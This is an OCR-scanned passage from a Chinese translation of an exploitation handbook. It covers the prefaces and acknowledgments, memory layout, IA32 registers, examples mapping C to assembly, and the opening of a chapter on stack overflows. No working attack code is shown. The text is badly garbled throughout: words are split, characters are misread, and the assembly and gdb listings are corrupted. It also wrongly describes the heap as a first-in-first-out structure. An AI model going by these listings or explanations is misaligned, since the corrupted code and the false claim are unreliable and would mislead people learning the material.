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自 着 手 翻译 本 书 的 第 1 版 起 ， 已 近 4 年 。4 年 中 ， 有 太 多 的 变化 ， 但 这 本 书 一 直 都 在 我 的 心里 ， 
是 它 促使 我 做 一 件 以 前 从 未 想 过 的 事情 一 一 翻译 ， 是 它 让 我 结识 了 更 多 的 朋友 ， 是 它 让 我 明白 了 
自己 的 无 知 。 在 知识 更 新 如 此 频繁 的 时 代 ， 本 书 能 否 成 为 经 典 还 有 待 时 间 的 检验 ,但 如 果 你 对 黑 
客 技术 感 兴趣 ， 它 无 疑 会 成 为 你 的 得 力 助 手 。 

本 书 是 众多 作者 精诚 合作 的 成 果 ， 其 中 不 乏 创新 之 处 。 然 纵 观 国内 安全 类 书籍 , CHALE. 
一 是 国内 与 国外 的 研发 环境 的 确 有 相当 大 的 差距 ， 这 是 实情 ; 二 是 国内 某 些 人 即使 有 所 突破 ， 有 
所 创新 ， 也 不 愿意 与 他 人 分 享 。 黑 客 精神 强调 的 是 自由 ， 是 创新 。 从 这 一 方面 说 ， 国 内 很 少 有 人 
称 得 上 是 真正 的 黑客 。 更 有 甚 者 借 黑客 之 名 , 却 不 行 黑 客 之 实 , 将 黑客 技术 用 于 谋取 一 己 私 利 上 。 
我 在 这 里 警告 这 些 人 ， 请 正当 使 用 黑客 技术 ， 切 勿 继续 滥用 ， 否 则 终究 会 引火 上 身 。 

本 书 比 较 系 统 地 介绍 了 shellcoder 应 该 掌握 的 知识 ， 从 最 基本 的 栈 、 堆 、 内 存 布局 等 知识 点 ， 
扩展 到 操作 系统 的 层次 ， 并 花 了 大 量 的 篇 幅 介绍 怎样 发 现 并 利用 漏洞 ， 这 是 本 书 的 核心 ， 也 是 重 
点 所 在 。 更 难能可贵 的 是 ， 整 本 书 的 内 容 来 源 于 实际 ， 而 高 于 实际 ， 从 更 高 的 理论 层次 指导 我 们 
怎样 学 习 shellcoding。 

翻译 本 书 的 过 程 有 快乐 也 有 痛苦 。 快乐 自 不 必 说 , 痛苦 有 三 : 一 是 本 书 由 众多 高 手 合 著 而 成 ， 
有 些 行文 通俗 易 懂 ， 但 也 有 一 些 比 较 星 汲 ， 不 免 让 我 绞 尽 脑汁 ， 二 是 本 人 技术 水 平 有 限 ， 书 中 的 
一 些 技术 难点 就 如 同 硬骨头 ， 让 我 难以 下 手 ; 三 是 平常 空闲 时 间 有 限 ，4 年 中 我 把 大 部 分 业余 时 
间 都 花 在 这 上 面 了 ， 可 谓 旷日持久 。 但 令 人 欣 奈 的 是 ， 在 翻译 本 书 的 过 程 中 ， 我 得 到 了 家 人 与 朋 
友 的 理解 与 支持 ， 最 终 使 这 本 书 得 以 大 功 告 成 。 

在 翻译 本 书 第 1 版 时 ， 我 感叹 无 人 功 眼 识 珠 。 但 第 2 版 一 面世 ， 图 灵 公 司 的 刘 江 总 编 就 找到 我 
联系 翻译 事宜 ， 非 常 感谢 他 给 我 这 个 机 会 。 

另外 还 要 感谢 看 雪 论 坛 上 的 kaien、icytear、kmyc、qos 等 朋友 给 出 的 修改 意见 。 特 别 感谢 SCZ、 
kanxue 给 予 的 大 力 支 持 。 


cS dH 


“冰冻 三 尺 ， 非 一 日 之 功 ?， 黑 客 攻 防 与 学 习 也 一 样 ， 不 是 照 本 宣 科 ， 而 是 一 种 生活 方式 。 说 
以 此 书 献 给 理解 此 道 的 每 一 个 人 。 


首先 感谢 本 书 的 所 有 合 著者 : Gerardo Richarte、 Felix “FX” Linder, John Heasman Jack Koziol. 
David Litchfield. Dave Aitel、Sinan Eren、Neel Mehta 和 Riley Hassell。 特 别 感 谢 Wiley 出 版 公司 的 
工作 人 员 : 杰出 的 责任 编辑 Carol Long 和 优秀 的 策划 编辑 Kevin Kent。 从 个 人 角度 ， 我 还 要 感谢 
NGS 小 组 ， 感 谢 他 们 提供 的 大 量 研究 结果 、 技 术 方 面 的 讨论 和 思想 。 最 后 ， 我 还 要 感谢 我 的 夫人 

Victoria， 感 谢 她 对 我 的 爱 ， 感 谢 她 一 直 以 来 对 我 的 支持 与 包容 。 
— Chris Anley 


感谢 我 的 朋友 和 家 人 ， 感 谢 他 们 一 如 既往 的 支持 。 


John Heasman 





感谢 Phenoelit 的 朋友 们 。 尽 管 工作 、 生 活 中 有 很 多 波折 ， 尽 管 我 有 许多 千奇百怪 的 想法 ， 他 
们 仍 昌 和 我 在 一 起 。 要 特别 感谢 Mumpi， 他 是 我 的 好 朋友 ， 在 各 种 各 样 的 活动 中 都 给 予 我 可 贵 的 
支持 。 另 外 ， 还 要 感谢 SABRE Labs 团 队 ， 感 谢 Halvar Flake， 他 在 团队 的 工作 中 起 着 关键 的 作用 。 
感谢 我 的 爱人 Bine， 感 谢 她 日 复 一 日 对 我 的 关爱 。 





Felix “FX” Linder 


感谢 社区 中 的 每 一 个 人 ， 大 家 共享 快乐 、 观 点 和 发 现 。 尤 其 感谢 在 Core 安 全 技术 公司 工作 过 
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“如 果 术 语 的 含义 总 是 变 来 变 去 ， 不 仅 会 导致 原本 不 相干 的 推理 发 生 混淆 ， 就 连 既 定 的 前 提 
和 结论 也 会 频繁 地 被 颠倒 。” 
一 一 摘自 艾 达 。 奥 十 斯 塔 * 在 Sketch of The Analytical Engine 一 书 (18424) 中 所 做 的 注释 


本 书 第 1 版 主要 介绍 了 怎样 发 现 和 利用 安全 漏洞 ， 第 2 版 仍然 紧 紧 围绕 这 一 主题 展开 。 如 果 你 
是 一 位 技术 如 熟 的 网 络 审计 员 、 软 件 开发 人 员 或 系统 管理 员 ， 如 果 你 想 弄 明白 如 何 发 现 和 利用 最 
底层 的 bug， 这 本 书 将 是 你 最 好 的 选择 。 

那么 本 书 究竟 会 讲 些 什么 呢 ? 前 面 的 内 容 或 多 或 少 概括 了 一 些 。 本 书 主要 关注 任意 的 代码 执 
行 漏洞 ， 攻 击 者 借 这 些 漏 洞 在 目标 机 器 上 运行 他 们 的 代码 。 这 种 情况 发 生 时 ， 通 常 程 序 会 把 数据 
解释 成 自身 的 一 部 分 , 例如 , 攻击 者 利用 此 类 漏洞 可 以 把 HTTP 的 Host 首 部 变 成 返回 地 址 , 把 Email 
地 址 的 一 部 分 变 成 函数 指针 ， 等 等 。 程 序 在 执行 这 些 数 据 之 后 ， 结 果 通 常 都 是 灾难 性 的 。 现 代 处 
理 器 、 操 作 系统 以 及 编译 器 的 架构 是 此 类 问题 产生 的 根源 ， 正 如 艾 达 所 言 ,“ 操 作 的 记号 通常 也 
是 操作 结果 的 记号 ”。 当然， 她 讨论 的 是 数学 中 的 难点 : 数字 5 可 能 意味 着 “5 次 方 ” 也 可 能 意味 
着 “第 5 个 元 素 ”， 但 基本 的 思想 是 一 致 的 。 如 果 你 混淆 了 代码 和 数据 ， 就 会 陷入 困境 。 因 此 ， 本 
书 就 米 讨 论 代码 和 数据 ， 以 及 混淆 两 者 可 能 会 带 来 的 后 果 。 

自 本 书 第 1 版 于 2004 年 面世 以 来 ， 安 全 领域 变 得 更 加 复杂 了 ， 世 界 也 发 生 了 很 大 的 变化 。 一 
方面 ， 编 译 器 和 操作 系统 普遍 内 置 了 防护 措施 ， 用 于 防范 本 书 重点 讨论 的 各 种 漏洞 当然 ， 这 
些 措施 远 远 还 谈 不 上 尽善尽美 。 另 一 方面 ， 尚 无 迹象 表明 任意 代码 执行 漏洞 的 “供应 ”在 不 久 的 
将 来 会 难以 为 继 , 更 何况 查找 这 些 漏洞 的 方法 仍 在 不 断 花样 翻新 。 如 果 你 访问 美国 国家 漏洞 数据 
库 网 站 (nvd.nist.gov)， 单 击 statistics， 选 择 buffer overflow， 就 会 发 现 缓冲 区 溢出 的 数量 逐年 增 
加 。 

很 显然 ， 我 们 仍 需 要 了 解 这 些 bug 以 及 它们 是 如 何 被 利用 的 。 实 际 上 ， 当 我 们 考虑 怎样 保护 
自己 时 ， 有 许多 局 部 防御 措施 可 供 选 择 ， 在 这 种 情形 下 ， 有 人 主张 很 有 必要 了 解 精确 的 机 制 。 如 
果 你 正在 审计 网 络 ， 在 你 的 评估 过 程 中 ， 做 出 一 次 成 功 的 破解 将 会 带 给 你 100% 的 信心 ; 如 果 你 
是 一 个 软件 开发 者 ， 生 成 用 于 概念 验证 的 利用 程序 将 有 助 于 理解 首先 应 该 修复 哪些 bug;， 如 果 你 
正 准备 购买 一 款 安全 产品 ,知道 怎 样 规避 不 可 执行 栈 、 利 用 棘手 的 堆 溢 出 或 者 编写 利用 程序 编码 
器 ， 都 将 有 助 于 你 更 好 地 判断 各 厂商 的 产品 质量 。 通 常 来 说 ， 有 知 胜 于 无 知 。 那 些 居心 不 良 的 人 





(D 英国 数学 家 ， 世 界 上 第 一 个 计算 机 程序 员 。 她 是 英国 著名 诗人 拜 伦 的 女儿 。 一 一 编者 注 
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已 经 知道 这 些 东 西 了 ， 所 以 网 络 审计 者 、 软 件 作 者 、 公 共 网 络 的 管理 者 也 应 该 了 解 它 。 

本 书 和 其 他 同类 的 书 有 什么 不 一 样 呢 ? 首先， 本 书 的 作者 都 长 期 奋战 在 第 一 线 , 发 现 并 利用 
bug 是 我 们 工作 的 一 部 分 。 我 们 不 仅 是 这 么 写 的 ， 而 且 每 天 也 是 这 人 么 做 的 。 其 次 ， 你 会 发 现 我 们 
没有 在 工具 上 花费 过 多 的 笔墨 。 这 本 书 的 大 部 分 内 容 全 是 关于 安全 bug 的 第 一 手 材 料 一 一 汇编 程 
序 、 源 码 、 栈 、 夫 等。 掌握 了 这 些 内 容 你 就 能 够 编写 工具 ， 而 不 仅仅 是 使 用 别人 编写 的 工具 。 最 
后 ， 还 有 一 个 观点 和 态度 的 问题 。 尽 管 书 中 没有 专门 论述 ， 但 我 们 相信 你 在 阅读 全 书 的 过 程 中 随 
时 都 能 够 体会 到 ; 你 必须 动手 实践 ， 不 断 探索 , 最终 彻底 理解 自己 使 用 的 系统 。 这 样 你 才能 真正 
体会 到 学 习 的 乐趣 。 

无 需 多 言 ， 你 已 经 一 册 在 担 了 ?。 希 望 你 能 喜欢 它 ， 也 希望 它 能 帮 上 你 的 忙 ， 更 希望 你 不 要 
把 这 些 知识 用 错 地 方 。 如 果 你 有 什么 想 说 的 ， 不 管 是 批评 还 是 建议 ， 都 请 告诉 我 。 


Chris Anley 


Q@ 本 书 配套 网 站 http://www.wiley.com/go/shellcodershandbook 提 供 了 本 书 中 的 所 有 示例 代码 和 相关 信息 。 一 一 编者 注 
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ML 了 使 你 更 好 地 理解 本 书 其 他 部 分 的 内 容 ， 本 章 将 介绍 一 些 基本 的 概念 ， 这 些 内 容 和 大 
VJ 学 课程 中 所 要 求 的 阅读 材料 类 似 ， 希 望 你 们 早 就 了 然 于 心 。 本 章 不 会 面面俱到 地 介绍 
所 有 你 需要 知道 的 内 容 ， 你 应 该 以 本 章 作为 学 习 后 续 章 节 的 起 点 。 
通读 本 章 ， 温 故而 知 新 。 在 阅读 过 程 中 ， 如 果 不 太 理解 某 个 概念 ， 建 议 你 记 下 来 ， 以 进行 更 
深入 的 研讨 。 在 学 习 后 面 的 内 容 前 ， 要 花 些 时 间 来 理解 这 些 概念 。 
本 书 配套 网 站 Chttp://www.wiley.com/go/shellcodershandbook) 是 对 本 书 的 有 益 补充 ， 在 这 个 
站 点 上 可 以 找到 本 书 大 部 分 例子 的 源码 。 在 运行 这 些 示例 时 ， 可 以 将 这 些 示例 代码 复制 和 粘贴 到 
你 喜欢 的 文本 编辑 器 中 ， 以 节省 时 间 。 


1.1 基本 概念 


要 想 真 正 掌握 本 书 的 内 容 , 你 至 少 应 该 熟悉 计算 机 编程 语言 、 操 作 系统 和 硬件 体系 结构 等 内 
容 。 如 果 你 不 能 理解 它们 的 工作 机 理 ， 也 就 难于 检测 出 它 是 否 发 生 了 故障 。 这 个 法 则 适用 于 计算 
机 ， 同 样 适用 于 发 现 和 利用 计算 机 漏洞 。 

除 此 之 外 , 你 还 有 必要 熟悉 安全 研究 者 常用 的 行 话 , 即 安全 研究 者 常用 的 一 些 定 义 、 术 语 等 ， 
以 便 更 好 地 理解 本 书后 面 的 内 容 。 

漏洞 〈vulnerability， 名 词 )， 系 统 中 存在 的 安全 缺陷 ， 攻 击 者 常 利用 它们 ， 以 不 同 于 程序 设 
计 者 的 意图 来 操纵 系统 ， 包 括 影响 系统 的 可 用 性 、 提 升 访问 特权 、 在 未 经 授权 的 情况 下 完全 控制 
系统 ， 以 及 一 些 其 他 危害 。 漏 洞 通常 也 称 为 安全 漏洞 或 安全 错误 。 

利用 9 (Exploit， 动 词 )， 利 用 漏洞 ， 试 图 以 不 同 于 程序 设计 者 的 意图 操纵 目标 系统 的 行为 。 

破解 〈exploit， 名 词 ): 利用 漏洞 的 工具 、 指 令 集 或 代码 ， 也 称 为 Proof Of Concept (POC). 

Oday? (名 词 )， 指 还 没有 向 公众 揭露 的 漏洞 的 破解 代码 ， 有 时 也 指 漏洞 本 身 。 

模糊 测试 工具 〈fuzzer， 名 词 ): 它 是 一 种 工具 或 应 用 程序 ， 主 要 功能 是 尝试 着 把 所 有 可 能 的 
(RAEN) 畸形 数据 提交 给 目标 系统 ， 以 此 来 检测 目标 系统 中 是 否 存 在 错误 。 它 能 使 攻击 者 在 
不 完全 了 解 目标 系统 的 内 部 功能 时 也 可 能 会 发 现 错误 ， 并 在 适当 的 时 候 利用 它们 。 


O 本 文中 有 时 也 译 成 破解 。 一 一 译 者 注 
© 0day 另 外 一 层 含义 是 指 骇 客 在 最 短 时 间 内 不 一 定 是 当天 》〉 发 布 软件 的 破解 版 本 。 一 一 译 者 注 
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1.1.1 AFER 

内 存 管 理 ， 特 别 是 Intel 32 位 (1A320. 体系 结构 的 内 存 管理 知识 是 学 习 本 书 所 必须 掌握 的 内 
容 之 一 。 本 书 的 第 一 部 分 主要 介绍 IA32 Linux 的 内 存 管理 知识 。 因 为 本 书 描述 的 大 多 数 安全 漏洞 
都 源 自 “ 改 写 ” 或 “溢出 ”内 存 ， 你 还 需要 理解 操作 系统 是 怎样 管理 内 存 的 。 


指令 与 数据 

现代 计算 机 不 会 真正 区 分 指令 与 数据 ， 所 以 当 我 们 把 数据 作为 指令 提交 给 处 理 器 时 ， 它 也 
会 很 高 兴 地 执行 这 些 “ 指 令 ”， 正 因 如 此 ， 破 解 目 标 系统 才 成 为 可 能 。 在 后 续 章 节 里 ， 我 们 将 
介绍 当 系 统 设 计 者 要 求 输入 数据 时 怎样 插入 指令 ,也 将 介绍 怎样 利用 溢出 用 自己 的 指令 改写 程 
序 的 指令 。 当 然 ， 做 这 些 的 目的 只 有 一 个 : 控制 目标 程序 的 执行 流程 。 


当 执 行程 序 时 , 程序 体 有 序 地 排列 在 内 存 里 。 首 先 ， 操作 系统 在 内 存 中 为 程序 运行 创建 地 址 
空间 ， 地 址 空间 包含 实际 的 程序 指令 和 需要 的 数据 。 

操作 系统 在 创建 地 址 空间 后 ， 把 程序 的 可 执行 文件 加 载 到 新 创建 的 地 址 空间 里 。 程序 (可 执 
行文 件 ) 一 般 包含 三 种 类 型 的 段 : .text、.bss 和 .data。.text 段 在 内 存 中 被 映射 为 只 读 ，. data 
和 .bss 被 映射 为 可 写 。 全 局 变量 一 般 保 存在 .bss 和 .data 段 里 。.data 段 包含 静态 初始 化 的 数 
据 ，.bss 段 包含 未 初始 化 的 数据 ，.text 段 包含 程序 指令 。 

加 载 完 成 后 ， 系 统 紧 接着 就 开始 为 程序 初始 化 “ 栈 ” 和 “ 扒 ”。 栈 是 一 种 “后 进 先 出 ”(Last 
In First Out, LIFO) 的 数据 结构 ， 即 最 后 入 栈 的 数据 ， 将 第 一 个 从 栈 上 移 走 。 栈 比较 适合 保存 暂 
时 性 的 信息 ， 即 不 需要 长 期 保存 的 信息 。 栈 用 于 保存 局 部 变量 、 函 数 调用 信息 以 及 其 他 调用 函数 
(过 程 ) 后 系统 通常 会 清除 的 信息 。 

栈 的 另外 一 个 重要 特征 是 它 的 地 址 空间 “向 下 减少 ” 也 就 是 说 ， 栈 上 保存 的 数据 越 多 ， 栈 
地 址 的 值 就 越 小 。 

堆 是 另外 一 种 保存 程序 信息 的 数据 结构 , 更 准确 的 说 法 是 , 它 保存 程序 的 动态 变量 。 堆 是 “ 先 
进 先 出 ” (First In First Out, FIFO) 的 数据 结构 ， 人 允许 在 “ 扒 ” 的 一 端 插入 数据 ， 从 另 一 端 移 走 
数据 。 堆 的 地 址 空间 是 “向 上 增加 ”的 ， 即 堆 上 保存 的 数据 越 多 ， 堆 地 址 的 值 就 越 大 ， 这 一 点 和 
栈 正 好 相反 。 如 下 面 的 内 存 空间 图 所 示 。 

t 更 低地 址 (0x08000000) 


Shared libraries 

- text 

.bss 

Heap (grows 1!) 
Stack (grows f) 
env pointer 

Argc 

V 更 高 地 址 (0xbfffffftp 


内 存 管理 是 本 书 的 基础 ， 读 者 必须 透彻 、 详 尽 地 理解 这 一 概念 。 建 议 你 先 抽 时 间 阅 读本 书 第 
13 章 前 半 部 分 介绍 的 内 存 管理 知识 ， 也 可 以 访问 http:Wlinux-mm.org/ 了 解 Linux 内 存 管理 知识 。 牢 
固 掌 握 内 存 管理 的 知识 ， 将 有 助 于 你 更 好 地 掌握 使 用 内 存 的 编程 语言 一 一 汇编 语言 。 











4 AIF 写 在 前 面 





1.1.2 ”汇编 语言 

为 了 理解 本 书 的 大 部 分 内 容 ， 我 们 还 必须 掌握 汇编 语言 ， 尤 其 是 IA32 上 的 汇编 语言 。 原 因 有 
三 ,一 是 本 书 中 所 举 的 例子 大 部 分 都 是 用 IA32 汇 编 语言 编写 的 ， 二 是 在 寻找 bug 的 过 程 中 ， 我 们 
需要 阅读 并 理解 汇编 指令 ; 三 是 在 大 多 数 利用 安全 漏洞 的 过 程 中 ,我们 需要 自己 编写 (或 修改 已 
存在 的 ) 汇编 程序 。 

除 IA32 外 ， 熟 知 其 他 的 硬件 体系 结构 也 很 重要 〈 只 是 破解 起 来 稍微 有 些 难度 )， 因 此 ， 我 们 
在 书 中 用 了 几 章 介绍 怎样 在 非 IJA32 平 台 上 发 现 和 利用 漏洞 。 我 们 建议 : 如 果 你 打算 在 某 种 硬件 平 
台 上 研究 安全 问题 ,那么 一 定 要 牢固 掌握 汇编 语言 (尤其 是 你 选择 的 硬件 结构 体系 的 汇编 语言 )， 
这 对 你 的 帮助 将 非常 大 。 

如 果 在 此 之 前 , 你 没有 接触 过 汇编 语言 , 那么 我 建议 你 先 从 数字 系统 (特别 是 十 六 进 制 )、 
数据 大 小 、 数 值 符号 表示 等 内 容 学 起 ， 这 些 内 容 在 大 多 数 大 学 计算 机 体系 架构 教材 里 都 可 以 
找到 。 

EB 

要 想 发 现 并 利用 漏洞 , 一 定 要 熟悉 IA32 寄 存 器 以 及 怎样 用 汇编 指令 操作 它们 。 可 以 用 汇编 指 
令 访 问 〈 读 、 写 ) 寄存 器 。 

寄存 器 是 存储 器 ， 考 虑 到 性 能 的 因素 ， 通 常 直 接 把 寄存 器 和 总 线 连 在 一 起 。 现 代 计 算 机 系 
统 在 执行 操作 时 要 使 用 寄存 器 ， 一 般 用 汇编 指令 来 操作 寄存 器 。 从 应 用 的 角度 可 以 把 寄存 器 分 
为 4 类 : 

口 通用 寄存 器 
a 段 寄存 器 

a 控制 寄存 器 
O 其 他 寄存 器 

在 进行 普通 的 数学 运算 时 , 通常 会 使 用 通用 寄存 器 。 对 IA32 来 说 , 通用 寄存 器 包括 EAX、EBX 
和 Ecx 等 寄存 器 ， 一 般 用 来 保存 数据 和 地 址 、 偏 移 地 址 、 计 数 和 实现 其 他 操作 。 

我 们 特别 要 注意 通用 寄存 器 中 的 扩展 栈 指 针 寄 存 器 ESsP〈 也 称 为 栈 指针 )。ESP 指 向 栈 顶 ， 也 
就 是 下 一 个 将 进行 栈 操作 的 地 址 。 为 了 理解 第 2 章 介 绍 的 栈 涕 出， 你 应 该 彻底 搞 清楚 怎样 用 常用 
汇编 指令 操纵 ESP 以 及 ESP 如 何 作用 于 存储 在 栈 上 的 数据 。 

段 寄存 器 是 另 一 个 有 趣 的 寄存 器 ， 和 IA32 里 其 他 类 型 的 寄存 器 不 一 样 ， 段 寄存 器 是 16 位 的 
(其 他 的 寄存 器 是 32 位 的 )。 段 寄存 器 cs、Ds 和 ss 一 般 用 作 段 基 址 寄存 器 ， 向 后 兼容 16 位 的 应 
用 程序 。 

控制 寄存 器 用 来 控制 处 理 器 的 执行 流程 。 对 于 IA32 来 说 ， 其 中 最 重要 的 是 “扩展 指令 指针 ” 
EIP 《也 称 为 “指令 指针 ”)。EIP 中 保存 着 下 一 条 即将 执行 的 机 器 指令 的 地 址 。 如 果 你 想 控制 程 
序 的 执行 流程 (本 书 的 核心 内 容 之 一 ), 是 否 可 以 访问 和 改变 保存 在 EIP 中 的 地 址 将 是 整个 问题 的 
关键 。 

“其 他 ”寄存 器 指 的 是 不 属于 前 3 个 分 类 的 寄存 器 。 其 中 值得 关注 的 是 “扩展 标志 ”(EFLAGS) 
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寄存 器 ， 它 由 不 同 的 标志 位 组 成 ， 用 于 保存 处 理 器 执行 各 种 测试 的 结果 。 
熟悉 寄存 器 后 ， 你 就 可 以 学 习 汇编 程序 了 。 


1.2 识别 汇编 指令 里 的 C 和 C++ 代码 


C 系 列 编程 语言 (C、C++、C#) 是 应 用 最 广泛 的 一 类 编程 语言 ， 并 且 无 疑 是 Windows 和 UNIX 
服务 器 程序 使 用 最 多 的 编程 语言 ， 而 这 两 类 应 用 程序 正 是 漏洞 探查 的 对 象 。 因 此 ， 掌 握 C 语 言 至 
关 重 要 。 

除 C 语 言 外 ， 我 们 还 应 该 熟悉 C 语 句 如 何 编译 为 对 应 的 汇编 指令 ， 并 理解 如 何 用 汇编 的 形式 
表示 C 变 量 、 指 针 、 函 数 和 内 存 分 配 等。 掌握 这 些 知 识 会 使 后 面 的 学 习 轻 松 许多 。 

我 们 先 看 一 些 常 见 的 C 和 C++ 代码 及 对 应 的 汇编 代码 。 如 果 你 很 快 就 能 理解 这 些 例子 ， 那 么 
就 可 以 继续 学 习 本 书后 面 的 内 容 了 。 

先 看 一 下 怎样 在 C++ 里 声明 一 个 用 于 计数 的 整数 。 


int number; 
. more code . . . 
number++; 


相应 的 汇编 代码 是 : 
number dw 0 
. .more code . . . 





mov eax,number 
inc eax 
mov number,eax 


在 这 个 例子 里 ， 先 用 DW (Define Word ) 指令 定义 整数 numper， 接 着 把 它 放 入 ERx， 并 把 ERx 
加 1， 然 后 把 EAX 重 新 放 入 number。 
再 来 看 一 个 简单 的 C++ 二 语句。 
int number; 
if (number«0) 
{ 


. «More code . . . 


) 
下 面 是 这 个 if 语句 对 应 的 汇编 代码 。 


number dw 0 
mov eax,number 
or eax,eax 

jge label 

<no> 

label :<yes> 


在 这 个 例子 里 ， 我 们 用 pw 指令 定义 number， 然 后 把 存储 在 number 中 的 值 移入 EAX， 如 果 
number 大 于 或 等 于 0， 执 行 JGE (Jump if Greater than or Equal， 大 于 或 等 于 时 跳 转 ) 跳 到 lapbel。 
接 下 来 看 一 个 使 用 数组 的 例子 。 
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int array[4]; 
.more code . 
array[21-9; 


在 这 个 例子 里 ， 我 们 定义 一 个 有 4 个 元 素 的 数组 array， 并 把 其 中 的 一 个 元 素 设 为 9， 相 应 的 
汇编 代码 如 下 : 


array dw 0,0,0,0 
.more code . 

mov ebx,2 

mov array [ebx],9 


在 这 个 例子 里 ， 我 们 声明 了 一 个 数组 ， 然 后 通过 EBx 把 9 转移 到 数组 中 。 

最 后 ， 再 来 看 一 个 更 复杂 的 例子 ， 通 过 这 个 例子 ， 大 家 可 以 了 解 简单 的 C 函 数 对 应 的 汇编 代 
码 。 如 果 你 可 以 轻松 理解 这 个 例子 ， 恭 喜 ， 你 可 以 学 习 下 一 章 了 ! 

int triangle (int width, in height){ 

int array[5] = {0,1,2,3,4}; 

int area; 


area = width * height/2; 
return (area); 


H 

下 面 是 同一 个 函数 ， 但 是 是 以 反 汇编 的 形式 表示 的 。 下 面 是 gdb 调 试 器 的 输出 。gdb 是 .GNU 
组 织 开发 的 调试 器 ， 在 http://www.gnu.org/software/gdb/documentation/ 上 可 以 找到 更 多 关于 它 的 资 
料 。 看 看 你 能 否 把 下 面 的 汇编 指令 与 C 代 码 对 应 起 来 : 


0x8048430 <triangle>: push Sebp 

0x8048431 <triangle+l>: mov $esp, €$ebp 

0x8048433 «triangle-3»: push Sedi 

0x8048434 «triangle-4»: push Sesi . 

0x8048435 <triangle+5>: sub $0x30,%esp 

0x8048438 <triangle+8>: lea Oxffffffad8(%ebp), $edi 
0x804843b <triangle+11>: mov $0x8049508, tesi 
0x8048440 <triangle+16>: clad 

0x8048441 <triangle+17>: mov $0x30,%esp 

0x8048446 «triangle-22»: repz movsl %ds:( tesi), tes: ( %edi) 
0x8048448 <trianglet+24>: mov 0x8 (%ebp) , teax 
0x804844b <triangle+27>: mov %eax, Sedx 

0x804844d <triangle+29>: imul Oxc (%ebp) , teax 
0x8048451 <triangle+33>: mov %edx, eax 

0x8048453 <triangle+35>: sar SOx1f, teax 

0x8048456 <triangle+38>: shr SOx1f, teax 

0x8048459 <triangle+41>: lea (%eax, tedx, 1), $eax 
0x804845c <triangle+44>: sar $eax 

Ox804845e <triangle+46>: mov €&eax,0xffffffd4(Sebp) 
0x8048461 <triangle+49>: mov Oxffffffd4(Sebp),S$eax 


0x8048464 <triangle+52>: mov seax, eax 











0x8048466 «triangle*54»: add $0x30,%esp 
0x8048469 <triangle+57>: pop $esi 
0x804846a <triangle+58>: pop Sedi 
0x804846b «triangle-59»: pop Sebp 
0x804846c <triangle+60>: ret 





这 个 函数 主要 是 把 两 个 数 相 乘 ， 因 此 请 注意 代码 中 部 的 imul 指 令 。 也 要 注意 前 几 条 指令 
保存 se， 从 zsz 减 去 。 这 个 减 操作 主要 是 为 函数 的 本 地 变量 在 栈 上 腾 出 一 块 空间 。 值 得 一 提 的 
是 ， 函 数 返回 的 结果 保存 在 EAX 寄 存 器 里 。 


1.3 小 结 


本 章 介绍 了 一 些 理解 本 书后 续 内 容 所 需 的 基本 概念 , 你 应 该 温习 一 下 这 些 内 容 。 如 果 对 汇编 
语言 以 及 C 或 C++ 还 不 甚 了 解 ， 应 该 花 些 时 间 学 习 这 些 背 景 知 识 ， 只 有 这 样 ， 你 才能 完全 理解 本 
书后 续 内 容 。 





Bw 











人 历史 上 看 ， 栈 缓冲 区 溢出 一 直 是 最 流行 、 我 们 理解 得 最 透彻 的 安全 问题 之 一 。 迄 今 
AE, 至 少 也 有 几 十 篇 文章 讨论 了 各 种 各 样 的 体系 结构 上 的 栈 溢出 技术 。 一 篇 最 常 
引用 、 也 可 能 是 最 先 公 开讲 述 栈 溢 出 的 文章 是 Aleph One 写 于 1996 年 并 在 Phrack 杂 志 上 发 表 的 
“Smashing the Stack for Fun and Profit”。 这 篇 文章 第 一 次 简明 扼要 地 阐述 了 缓冲 区 溢出 漏洞 怎样 
产生 以 及 怎样 利用 它们 。 建 议 你 读 一 下 发 表 在 Phrack 杂 志 上 的 原文 ， 参 见 http://insecure.org/stf/ 
smashstack.html. 

虽然 Aleph One% f “Smashing the Stack for Fun and Profit”， 但 栈 溢出 并 不 是 他 发 现 的 ， 在 
这 篇 文章 发 表 的 十 年 前 甚至 更 早 ， 栈 溢出 及 其 利用 方法 就 已 经 四 处 流传 了 。 从 理论 上 讲 ， 栈 溢出 
是 伴随 C 语 言 的 出 现 而 出 现 的 ， 对 其 漏洞 的 利用 也 有 至 少 25 年 了 。 尽 管 它们 是 人 类 最 了 解 、 最 公 
开 的 漏洞 之 一 , 但 遗憾 的 是 ， 在 如 今 流 行 的 软件 中 ,仍然 可 以 看 到 栈 溢出 的 身影 。 你 不 信 ? 翻 翻 
安全 新 闻 ， 总 能 看 到 一 些 和 本 章 描述 类 似 的 栈 溢出 漏洞 。 


2.1 缓冲 区 


“缓冲 区 ”是 一 片 有 限 的 、 连 续 的 内 存 区 域 。 在 C 语 言 里 ， 最 常见 的 缓冲 区 是 数组 。 本 节 将 
主要 介绍 和 数组 相关 的 内 容 。 

因为 在 C 和 C++ 语言 里 ， 没 有 考虑 检查 缓冲 区 的 内 在 边界 ， 所 以 使 栈 溢出 成 为 可 能 。 换 句 话 
说 ，C 语 言 系列 没有 内 置 检查 机 制 来 确保 复制 到 缓冲 区 的 数据 不 得 大 于 缓冲 区 的 大 小 。 

因此 ， 如 果 程 序 员 没 有 编写 检查 过 大 输入 数据 的 代码 ， 当 这 个 数据 足够 大 时 ， 将 会 溢出 
缓冲 区 的 范围 ， 从 而 改写 其 他 的 缓存 区 域 。 在 本 章 后 续 内 容 中 你 将 会 看 到 ， 一 旦 输入 的 数据 
超出 缓冲 区 的 范围 ， 什 么 事情 都 有 可 能 发 生 。 我 们 先 看 一 个 例 上 ， 这 个 例子 说 明 在 默认 情况 
下 C 对 缓冲 区 没有 进行 边界 检查 。( 在 本 书 配套 网 站 上 可 以 找到 这 段 代 码 ， 以 及 其 他 的 代码 段 
和 程序 。) 


#include <stdio.h> 
#include <string.h> 








int main {) 
{ 
int array[5] = {1, 2, 3, 4, 5}; 
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printf ("%d\n", array[5] ); 
} 


在 这 个 例子 里 ,我 们 使 用 C 定 义 了 一 个 包含 5 个 元 素 的 数组 array。 因 为 是 演示 ， 我们 故意 犯 
了 一 个 C 编 程 菜 鸟 常 犯 的 错误 : 忘 了 包含 5 个 元 素 的 数组 应 该 以 元 素 0 array[0] 开 始 ， 以 元 素 4 
array [4] 结 束 。 所 以 ， 当 用 array[5] 读 第 5 个 元 素 的 时 候 ， 实际 上 是 超出 了 数组 的 范围 ， 延 伸 到 
“第 6 个 ”元 素 了 。gcc 编 译 器 在 编译 时 没有 检查 到 这 个 错误 ， 但 运行 时 会 得 到 奇怪 的 结果 : 
shellcoders@debian:~/chapter_2$ cc buffer.c 


